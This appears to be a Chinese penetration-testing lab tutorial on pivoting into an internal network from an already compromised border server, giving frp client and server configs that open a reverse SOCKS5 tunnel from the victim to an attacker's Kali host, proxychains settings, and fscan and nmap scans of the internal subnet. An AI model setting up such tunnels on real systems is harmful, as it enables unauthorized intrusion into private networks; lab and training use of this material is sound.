文章目录
背景介绍
-
- 背景介绍
- frp一层代理(反向)
-
- 客户端 (client)
- 服务端(client)
- 测试连接
- 摘抄
假设:目前已获取边界服务器(192.168.0.104)的权限 实现:通过frp做反向代理,实现192.168.0.107外网主机–成功访问内网oa系统–内网192.168.52.30系统 frp下载地址 https://github.com/fatedier/frp/releases
frp一层代理(反向) 客户端 (client)ubuntu-web1(192.168.0.104)
配置远程连接的IP地址(192.168.0.107),通过tcp协议的socks5的7777端口进行通信传输 frpc.ini ------------------------------------ [common] server_addr = 192.168.0.107 server_port = 7000 [plugin_socks5] type = tcp #协议 remote_port = 7777 #指定远程服务器的端口 plugin = socks5 ------------------------------------
启动客户端 chmod +x frpc chmod +x frpc.ini exectue -f ./frpc -c ./frpc.ini
kali(192.168.0.107)
frps.ini ----------------------------------- [common] bind_port = 7000 #必要,frp服务端端口 ------------------------------------
启动服务端 chmod +x frps chmod +x frps.ini ./frps -c ./frps.ini
kali本地添加proxy配置
vim /etc/proxychains4.conf ---------------------------------- socks5 192.168.0.107 7777 ----------------------------------
第一步 使用fscan 进行扫描,发现主机 https://github.com/shadow1ng/fscan/releases/tag/1.8.1
./fscan_amd64 -h 192.168.52.0/24
使用nmap就行扫描
proxychains nmap -Pn -sT -sV -F -O 192.168.52.30
第二步 浏览器开启代理,访问内网系统
第三步 burp开启代理,抓包访问内网系统
第四步 使用代理,远程桌面内网主机